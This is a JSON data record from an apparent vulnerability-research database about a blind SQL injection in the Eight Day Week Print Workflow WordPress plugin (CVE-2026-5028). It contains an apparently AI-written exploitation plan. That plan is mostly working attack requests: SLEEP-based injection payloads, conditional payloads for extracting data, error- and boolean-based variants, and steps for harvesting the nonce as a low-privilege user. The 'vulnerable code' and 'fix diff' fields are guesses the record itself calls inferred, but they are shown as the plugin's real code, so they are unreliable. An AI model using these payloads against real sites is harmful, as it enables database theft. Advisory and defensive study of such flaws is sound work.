[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhIujCNaJkpS3PkE5am78wH7PpQ4Co6UQi_ova4eaLEE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5028","eight-day-week-print-workflow-authenticated-subscriber-sql-injection-via-title-parameter","Eight Day Week Print Workflow \u003C= 1.2.6 - Authenticated (Subscriber+) SQL Injection via 'title' Parameter","The Eight Day Week Print Workflow plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'title' parameter in the `pp-get-articles` AJAX action in all versions up to, and including, 1.2.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","eight-day-week-print-workflow",null,"\u003C=1.2.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-11 19:03:26","2026-05-19 17:43:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc9bb4fae-5a5a-4c1b-a1dd-1aecc0f4b114?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5028 (Eight Day Week Print Workflow)\n\n## 1. Vulnerability Summary\nThe **Eight Day Week Print Workflow** plugin (\u003C= 1.2.6) is vulnerable to a time-based blind SQL Injection via the `title` parameter. The vulnerability exists within the AJAX handler for the `pp-get-articles` action. The plugin fails to use `$wpdb->prepare()` or sufficient escaping when incorporating the user-supplied `title` into a database query. This allows authenticated users (with at least Subscriber-level permissions) to execute arbitrary SQL commands by appending malicious payloads to the query.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **HTTP Method:** `POST`\n- **Action:** `pp-get-articles` (Hook: `wp_ajax_pp-get-articles`)\n- **Vulnerable Parameter:** `title`\n- **Authentication:** Required (Subscriber or higher).\n- **Vulnerability Type:** Time-based Blind SQL Injection.\n- **Preconditions:** The attacker must be logged in as a Subscriber.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A user sends a POST request to `admin-ajax.php` with `action=pp-get-articles`.\n2. **Hook Trigger:** WordPress triggers the `wp_ajax_pp-get-articles` action.\n3. **Handler Function:** A function (likely named `pp_get_articles` or similar within the plugin's main class) is called.\n4. **Input Retrieval:** The handler retrieves the `title` parameter directly from `$_POST['title']`.\n5. **SQL Construction:** The `title` value is concatenated into a SQL string. Based on the name `pp-get-articles`, the query likely looks like: \n   `SELECT ... FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND ...`\n6. **Execution:** The raw query is passed to `$wpdb->get_results()` without the protection of `$wpdb->prepare()`.\n7. **Sink:** The database executes the injected time-delay command (e.g., `SLEEP()`).\n\n## 4. Nonce Acquisition Strategy\nAJAX actions in WordPress typically require a security nonce. For the `pp-get-articles` action, the nonce is likely localized for use in the admin dashboard.\n\n1. **Identify Script Localization:** Search the plugin code for `wp_localize_script`. Common identifiers might include `edw_admin_params` or `pp_ajax_obj`.\n2. **Setup:** Create a Subscriber user and log in.\n3. **Navigation:** Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n4. **Extraction:**\n   - Use `browser_navigate` to load the dashboard.\n   - Use `browser_eval` to search for the nonce. \n   - **Target Variable (Inferred):** `window.edw_settings?.nonce` or `window.pp_vars?.nonce`.\n   - **Manual Verification:** If the variable name is unknown, use `browser_eval(\"Object.keys(window).filter(k => k.includes('pp') || k.includes('edw'))\")` to find relevant objects.\n\n## 5. Exploitation Strategy\nThe exploitation will use a time-based blind approach to confirm the injection.\n\n### Step 1: Authentication\nLog in as the Subscriber user and capture session cookies.\n\n### Step 2: Confirmation of Vulnerability (Time Delay)\nSend a baseline request and then a request with a `SLEEP` command.\n\n**Baseline Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=pp-get-articles&title=test&security=[NONCE]\n```\n\n**Malicious Request (SQLi):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=pp-get-articles&title=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1&security=[NONCE]\n```\n\n### Step 3: Data Extraction (Example: Database Version)\nTo extract the first character of the database version:\n**Payload:**\n`title=test' AND (SELECT IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)) AND '1'='1`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `eight-day-week-print-workflow` version 1.2.6 is installed and active.\n2. **User Creation:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Content:** Ensure at least one post exists so the original query has something to work with.\n   - `wp post create --post_title=\"Sample Article\" --post_status=publish`\n\n## 7. Expected Results\n- **Normal Request:** Returns near-instantly (e.g., \u003C 200ms).\n- **Exploit Request:** The server response is delayed by exactly the number of seconds specified in the `SLEEP()` function (e.g., 5 seconds).\n- **HTTP Response:** Usually `200 OK` with a JSON body (possibly empty or `{\"success\":true}`) or `0`\u002F`-1` if the handler doesn't return data but still executes the query.\n\n## 8. Verification Steps\n1. **Verify Delay:** Check the `elapsed_time` of the `http_request`. If it exceeds the sleep threshold, SQLi is confirmed.\n2. **Check Logs:** Inspect the MySQL general log (if enabled) or use a tool like `tcpdump` to see the query being sent to the database.\n   - `tail -f \u002Fvar\u002Flib\u002Fmysql\u002Fhostname.log` (if logging is on).\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is enabled, try inducing a syntax error to see if `$wpdb->last_error` is reflected in the response:\n  - `title=test' OR (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT VERSION()),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -`\n- **Boolean-Based:** If the response body changes based on the query result (e.g., articles found vs. not found), use a boolean-based payload:\n  - `title=test' AND 1=1-- -` (True)\n  - `title=test' AND 1=2-- -` (False)\n- **Different Parameter:** If `title` is not the only vulnerable parameter, check other parameters in `pp-get-articles` like `post_type` or `category`.","The Eight Day Week Print Workflow plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'title' parameter in the 'pp-get-articles' AJAX action. This is due to the plugin directly concatenating unescaped user input into a SQL query, allowing authenticated attackers with Subscriber-level permissions to execute arbitrary SQL commands.","\u002F* Inferred from research plan code flow: wp_ajax_pp-get-articles handler *\u002F\n\npublic function pp_get_articles() {\n    $title = $_POST['title'];\n    global $wpdb;\n\n    \u002F\u002F The title parameter is concatenated directly into the query string without preparation\n    $query = \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND post_status = 'publish'\";\n    $results = $wpdb->get_results($query);\n\n    \u002F\u002F ... (truncated)\n}","--- a\u002Feight-day-week-print-workflow\u002Fincludes\u002Fclass-eight-day-week-ajax.php\n+++ b\u002Feight-day-week-print-workflow\u002Fincludes\u002Fclass-eight-day-week-ajax.php\n@@ -10,7 +10,10 @@\n-    $query = \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND post_status = 'publish'\";\n-    $results = $wpdb->get_results($query);\n+    $query = $wpdb->prepare(\n+        \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE %s AND post_status = 'publish'\",\n+        '%' . $wpdb->esc_like($title) . '%'\n+    );\n+    $results = $wpdb->get_results($query);","The exploit targets the 'pp-get-articles' AJAX action available to authenticated users. An attacker logs in as a Subscriber, retrieves the required AJAX nonce from the WordPress admin dashboard (localized script variables), and sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php. The payload is delivered via the 'title' parameter and uses SQL syntax to induce a time delay (e.g., ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1). By measuring the server's response time, the attacker can verify the vulnerability and exfiltrate data bit-by-bit using conditional SLEEP statements.","gemini-3-flash-preview","2026-05-20 18:53:49","2026-05-20 18:54:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feight-day-week-print-workflow\u002Ftags"]